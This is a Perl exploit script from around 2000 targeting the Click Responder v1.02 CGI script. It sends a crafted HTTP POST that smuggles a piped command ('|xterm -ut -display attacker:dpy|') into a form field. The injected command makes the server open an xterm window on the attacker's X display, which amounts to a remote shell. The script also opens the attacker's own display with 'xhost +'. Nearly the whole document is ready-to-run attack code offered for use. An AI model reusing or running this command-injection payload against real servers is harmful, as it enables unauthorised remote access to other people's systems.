#!/usr/bin/perl -w

## Click Responder v1.02 exploit, by Luke and Mark Pfeifer.
## Just a old and free cgi-script which is vulnerable to the 
## pesky pipe! ;) After writing my first exploit, this goes 
## fast - I just have to change a few fields!
##
##  - teleh0r@doglover.com / anno 2000 -
##        http://teleh0r.cjb.net

use strict;
use Socket;

if (@ARGV < 3) {
    print("Usage: $0 <target> <attacker> <dpy>\n");
    exit(1);
}

my($target,$attacker,$dpy,$length,$command,
   $agent,$sploit,$iaddr,$paddr,$proto);

($target,$attacker,$dpy) = @ARGV;

if ($dpy !~ /\d/) {
    print("dpy must be a number, probably 0\n");
    exit(1);
}

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/clickresponder.pl\n");
print("Command: xterm -ut -display $attacker:$dpy\n\n");

system("xhost + $target");

$length = 87 + length($attacker.$dpy);

$command =
"go_to=&mestxt=%7Cxterm+-ut+-display+$attacker%3A$dpy%7C&subject".
"=subject+here&send_to=hass\@hass.com";


$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"; # heh ;)

$sploit=
"POST /cgi-bin/clickresponder.pl HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: $length

$command";

$iaddr = inet_aton($target)                     || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr)                || die("Error: $!\n");
$proto = getprotobyname('tcp')                  || die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto)    || die("Error: $!\n");
connect(SOCKET, $paddr)                         || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0)               || die("Error: $!\n");
close(SOCKET);

sleep(3);
system("xhost - $target");
print("\nAll done - hopefully you got the flying xterm!\n");
exit(0);